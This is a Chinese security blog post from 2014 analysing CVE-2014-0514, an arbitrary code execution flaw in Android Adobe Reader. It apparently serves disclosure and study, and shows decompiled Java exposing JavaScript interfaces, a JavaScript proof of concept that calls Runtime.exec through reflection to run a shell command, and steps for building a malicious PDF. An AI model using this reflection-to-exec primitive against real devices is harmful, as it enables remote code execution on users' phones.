Android Adobe Reader 任意代码执行分析(附POC)
livers · 2014/04/18 14:05
0x00 描述
前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞。
漏洞编号: CVE: 2014-0514
AdobeReader安装量比较大,又和浏览器容器不同,分析一下。
Android Adobe Reader 调用webview的不安全的Javascript interfaces。
导致可以执行任意js代码。具体查看WebView中接口隐患与手机挂马利用。
影响版本:
理论上Android Adobe Reader 11.2.0之前的版本多存在,Android version 11.1.3成功利用。
我查看了之前的几个版本例如Android Adobe Reader 11.1.2 如下图,问题也应该存在。
0x01利用
从反编译出来的java代码看
#!java
public class ARJavaScript
{
[...]public ARJavaScript(ARViewerActivity paramARViewerActivity){
[...]this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");this.mWebView.setWebViewClient(new ARJavaScript.1(this));this.mWebView.loadUrl("file:///android_asset/javascript/index.html");}
复制代码
_adobereader,_app,_doc,_escriptString,_event,_field
这几个变量都会存在任意代码执行的问题.
利用代码和之前一样。
#!java
function execute(bridge, cmd) {return bridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}if(window._app) {try {var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);window._app.alert(path + ' created', 3);} catch(e) {window._app.alert(e, 0);}
}
复制代码
这里不同是构造 恶意的PDF。
首先需要一个PDF编辑器,比如Adobe Acrobat(flash达人pz推荐).
然后添加表单按钮或者书签等,调用事件添加
我这里看了下button最好演示,和老外的那个poc一样基本上.
导入到android虚拟机里,打开,成功复现。
0x02 扩展
一些网盘或浏览器,看看能否调用adobe reader来预览pdf的应用可能会存在这个漏洞,大部分应用都是直接下载pdf到本地。可以再测试一些能预览pdf的邮箱之类的应用。
0x03 修复
新版本的Adobe Reader 11.2.0 [email protected]tInterface,老版本的用户则在adobereader禁用了表单的js执行。 不知道那些杀毒软件能不能检测到这些恶意poc呢 :)
附上poc.pdf
Android Adobe Reader 任意代码执行分析(附POC)相关推荐
- php 168任意代码执行漏洞之php的Complex (curly) syntax
今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...
- Nette框架未授权任意代码执行漏洞分析
Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...
- Foxit PDF Reader/Editor 任意代码执行漏洞
漏洞描述 Foxit PDF Reader是中国福昕(Foxit)公司的一款PDF阅读器. Foxit PDF Reader/Editor 受影响版本中在对javascript对象执行操作之前未验证对 ...
- Apple任意代码执行漏洞
报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...
- 绿盟科技网络安全威胁周报2017.11 关注Apache Struts2 任意代码执行漏洞 CVE-2017-5638...
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-11,绿盟科技漏洞库本周新增136条,其中高危63条.本次周报建议大家关注 Apache Struts2 任意代码执行漏洞 CVE-2017- ...
- 福昕阅读器曝多个安全漏洞 可导致远程任意代码执行
来自全球领先的网络解决方案提供商思科的Talos团队在上周四公布了存在于福昕PDF阅读器(Foxit PDF Reader)中的五个安全漏洞,其中有四个漏洞的CVSS 3.0得分都为8.8 ,这意味着 ...
- 微信惊现任意代码执行漏洞 360手机卫士提供自检方案
吓得我赶紧打开微信更了个新..不过啊, 这个漏洞应该更早之前发现的吧 ---------------------------------------------------------------- ...
- ecshop 2.x/3.x sql注入/任意代码执行漏洞
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中di ...
- Apache Log4j任意代码执行漏洞安全风险通告第三次更新
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 风险通告 近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞.经过分析,该组件存在Java JNDI注入 ...
最新文章
- 手摸手,带你用 vue 动画实现原生 app 切换效果,丝滑般的体验
- MongoDB与Cassandra的比较
- Delphi2010 DataSnap 学习(一)
- 什么样的数据应该放入缓存
- C# Winform 窗体美化(一、IrisSkin 换肤库)
- WCF同步到异步转换
- java流被关闭后怎样重新打开,java – 如何停止MediaPlayer流然后重新启动它? Android的...
- python把10进制数字转16进制并设置字符串宽度右对齐,前面填充0
- 程序员面试金典——5.6奇偶位交换
- Win32 API 列表5 (格式有点乱)
- java图片上传数量限制_bootstrap fileinput实现限制图片上传数量及如何控制分批多次上传...
- Unity任意方向拉伸物体
- python能做些什么事_一起来看看Python能干什么?使用Python能做哪些事
- Ubuntu 搜狗输入法 中文 无法切换 英文
- Matlab中动画绘制中hold on的小问题
- 用python求一元二次方程的解
- python语句--条件语句
- 大数据开发·关于虚拟机Hadoop完全分布式集群搭建教程
- Linux驱动——platform设备驱动实验
- 数据库可视化工具 — DBeaver,DataGrip,Navicat,pl/sql Developer
热门文章
- 线程为什么调用start()而不是直接调用run()
- php 大牛生小牛,C#算法之关于大牛生小牛的问题
- Android10.0 开机广播BOOT_COMPLETED发送流程分析
- LeetCode 4 两个排序数组的中位数
- python能处理图片吗_python图片处理(一)
- codeforces392B
- 雷林鹏分享:Lua 错误处理
- python基础笔记(非系统/自用/参考小甲鱼的零基础入门学习python)下
- PAT (Advanced Level) Practise 1004 解题报告
- java语言基础特性